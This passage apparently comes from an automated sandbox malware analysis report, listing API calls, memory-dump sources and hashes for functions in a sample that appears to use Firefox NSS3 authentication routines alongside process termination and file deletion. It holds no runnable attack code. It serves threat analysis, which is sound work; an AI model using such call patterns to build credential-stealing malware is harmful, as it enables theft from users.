lstrlen.KERNEL32(00000000), ref: 0040CDFC
DeleteFileA.KERNEL32(00000000), ref: 0040CE75

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 20b16cedb20524f5f0a3349ec898ee221183c09168d7a9fc23103f14ac9f8c1a
Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
Opcode Fuzzy Hash: 20b16cedb20524f5f0a3349ec898ee221183c09168d7a9fc23103f14ac9f8c1a
Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 6CED4FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CDB85D2,00000000,?,?), ref: 6CED4FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED50C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CED50D6

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: c3eef9dee696190f55ac444f6eb8d96f518d3315875a5840799f2b8fda40c51a
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 764162B2A412158BCB18CF58DCD179AB7E1FF4431872D466DD84ACBB02E779E891CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CE60420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6CE4C97F,?,?,?), ref: 6CE604BF
TlsGetValue.KERNEL32(00000000,?,6CE4C97F,?,?,?), ref: 6CE604F4
EnterCriticalSection.KERNEL32(?,?,?,6CE4C97F,?,?,?), ref: 6CE6050D
PR_Unlock.NSS3(?,?,?,?,6CE4C97F,?,?,?), ref: 6CE60556

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: cc818229c41f8b060482f0a351c5caf3f581f16619511a8204d4a8e06a30ac87
Instruction ID: 058153388bc800ce3858c9a5f725b6b07f4d4fc584bfc6d35d124cf899d18247
Opcode Fuzzy Hash: cc818229c41f8b060482f0a351c5caf3f581f16619511a8204d4a8e06a30ac87
Instruction Fuzzy Hash: 14417CB0A51662CFDB24DF2AC480669BBF0FF44318F24856DD8998BB01E730E891CF84

Uniqueness

Uniqueness Score: -1.00%

Function 6CF2A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6CF2A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6CF2A662), ref: 6CF2A69E
Part of subcall function 6CF2A690: PR_NewCondVar.NSS3(?), ref: 6CF2A6B4

PR_IntervalNow.NSS3 ref: 6CF2A8C6
EnterCriticalSection.KERNEL32(?), ref: 6CF2A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6CF2A944
PR_SetPollableEvent.NSS3(?), ref: 6CF2A94F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 46a78ccc9e3202cf755c310802332a2e642d106f803d70f5b9c934843e9dd4e7
Instruction ID: 46ef83a2e1ecf0520992e7db8767d45b88d8c8c61c6bef2ebea2208bd3a02cf1
Opcode Fuzzy Hash: 46a78ccc9e3202cf755c310802332a2e642d106f803d70f5b9c934843e9dd4e7
Instruction Fuzzy Hash: 1D4124B4A01A02DFC744CF6AC58099AFBF5FF48318725856AE95ACBB11E735E850CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE16C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE16C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CE16CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CE16CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CF38FE0), ref: 6CE16CFE

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 6ef7634276ba7f2a424c08ad6e940e99281463e59b5fe70c1392c3271b533988
Instruction ID: aad7fe7f739d04dc1d9aa012f1f235b9a2737409cd3249bbc716e032cb5e1d56
Opcode Fuzzy Hash: 6ef7634276ba7f2a424c08ad6e940e99281463e59b5fe70c1392c3271b533988
Instruction Fuzzy Hash: 5D3192B1A042169FDB04DF65C891ABFBBF9EF45248F20443DD905D7B10EB319915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,041431B0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 773fdb304f9d804e73498a05dead36b115f25edbb0eb5aae20829a328c0bfb2e
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: 773fdb304f9d804e73498a05dead36b115f25edbb0eb5aae20829a328c0bfb2e
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00415BD0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00415BEB

Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
CloseHandle.KERNEL32(00000000), ref: 00415CD6

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 77b0b68463d6fef5e6b200bc3673d24200d9c40290899e4313afa8eaf82be581
Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
Opcode Fuzzy Hash: 77b0b68463d6fef5e6b200bc3673d24200d9c40290899e4313afa8eaf82be581
Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE86DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CE86E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE86E57

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CE86E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CE86EAA

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: cda8ec51eef948998ff27a3c62af0b783b898ce9d9fa0201738d74a9edee9e3d
Instruction ID: 217212b21ca5604cbfc0cc55d6cf9526db0d722d6e7becb1736d9e7e32f41a7c
Opcode Fuzzy Hash: cda8ec51eef948998ff27a3c62af0b783b898ce9d9fa0201738d74a9edee9e3d
Instruction Fuzzy Hash: A0318031632516EADB145E74DD04396B7B8AB0131EF30063DD49ED6B40EB317655CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE82880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6CE82896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6CE82932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE8294C
free.MOZGLUE(?), ref: 6CE82955

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: 8a71f7ebf93465e122f865447a8376bd82c8f710573986d25ddce05e94d8a368
Instruction ID: 33915d0296d04ecc49a1a0a2109f06be03b61744a1b6432ed097285ca81c0c43
Opcode Fuzzy Hash: 8a71f7ebf93465e122f865447a8376bd82c8f710573986d25ddce05e94d8a368
Instruction Fuzzy Hash: D221A1B6A016009BEB208A2AEC09F4776F9AF9435CF24053CE48D87B61FA32E4188651

Uniqueness

Uniqueness Score: -1.00%

Function 6CE54FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CE5B60F,00000000), ref: 6CE55003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CE5B60F,00000000), ref: 6CE5501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CE5B60F,00000000), ref: 6CE5504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6CE5B60F,00000000), ref: 6CE55064

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 3b1d2d38679fb3d4c919b89c02c078c0351fce11edfe31a716c83d0b97e36b8e
Instruction ID: 8e581795f2d51b36a9c63d92669dfcd467d7f73d4ac3fd51c9575947883d4b12
Opcode Fuzzy Hash: 3b1d2d38679fb3d4c919b89c02c078c0351fce11edfe31a716c83d0b97e36b8e
Instruction Fuzzy Hash: 7E3128B4A05606CFDB40EF68C48466ABBF4FF09308B65852ED899D7701E731E8A4CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE82DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CE82E08

Part of subcall function 6CE714C0: TlsGetValue.KERNEL32 ref: 6CE714E0
Part of subcall function 6CE714C0: EnterCriticalSection.KERNEL32 ref: 6CE714F5
Part of subcall function 6CE714C0: PR_Unlock.NSS3 ref: 6CE7150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CE82E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CE82E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE82E95

Part of subcall function 6CE71200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE71228
Part of subcall function 6CE71200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CE71238
Part of subcall function 6CE71200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE7124B
Part of subcall function 6CE71200: PR_CallOnce.NSS3(6CF72AA4,6CE712D0,00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE7125D
Part of subcall function 6CE71200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CE7126F
Part of subcall function 6CE71200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CE71280
Part of subcall function 6CE71200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CE7128E
Part of subcall function 6CE71200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CE7129A
Part of subcall function 6CE71200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CE712A1

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 2a1ba89d8b7e90421beb26230dcf624188bb09bad89a059ed19cf20f7a094744
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 6621C2B1D023454BEB11CF549D48BAA3674ABA134CF310269DD0C6B752F7B2E698C3B6

Uniqueness

Uniqueness Score: -1.00%

Function 6CE6ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CE6F0AD,6CE6F150,?,6CE6F150,?,?,?), ref: 6CE6ECBA

Part of subcall function 6CE70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE187ED,00000800,6CE0EF74,00000000), ref: 6CE71000
Part of subcall function 6CE70FF0: PR_NewLock.NSS3(?,00000800,6CE0EF74,00000000), ref: 6CE71016
Part of subcall function 6CE70FF0: PL_InitArenaPool.NSS3(00000000,security,6CE187ED,00000008,?,00000800,6CE0EF74,00000000), ref: 6CE7102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CE6ECD1

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CE6ED02

Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CE6ED5A

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: d576edfba4a758859f4282f7a46c0c9fa2e397bced78ae555f6a118c6a8bd4a9
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 2E2180B1950B429BE7008F26DD44B52B7B4BFA524CF25C219A81C87BA2E770E594C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6CE3C890

Part of subcall function 6CE38F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE38FAF
Part of subcall function 6CE38F70: PR_Now.NSS3(?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE38FD1
Part of subcall function 6CE38F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE38FFA
Part of subcall function 6CE38F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CE39013
Part of subcall function 6CE38F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE39042
Part of subcall function 6CE38F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE3905A
Part of subcall function 6CE38F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CE39073
Part of subcall function 6CE38F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE39111

PR_GetCurrentThread.NSS3 ref: 6CE3C8B2

Part of subcall function 6CED9BF0: TlsGetValue.KERNEL32(?,?,?,6CF20A75), ref: 6CED9C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CE3C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE3C8EB

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 9970ae097de6eb832040413613437eecb7e9a0ae736b4699c42de0f02983f458
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 8001C666B0123067D60029B5AC80AAF75789F4515CF241239FC0CA6B01E759F958C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE9EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CE87FFA,?,6CE89767,?,8B7874C0,0000A48E), ref: 6CE9EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CE87FFA,?,6CE89767,?,8B7874C0,0000A48E), ref: 6CE9EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CE87FFA,?,6CE89767,?,8B7874C0,0000A48E), ref: 6CE9EE14

Part of subcall function 6CE70BE0: malloc.MOZGLUE(6CE68D2D,?,00000000,?), ref: 6CE70BF8
Part of subcall function 6CE70BE0: TlsGetValue.KERNEL32(6CE68D2D,?,00000000,?), ref: 6CE70C15

memcpy.VCRUNTIME140(?,?,6CE89767,00000000,00000000,6CE87FFA,?,6CE89767,?,8B7874C0,0000A48E), ref: 6CE9EE33

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
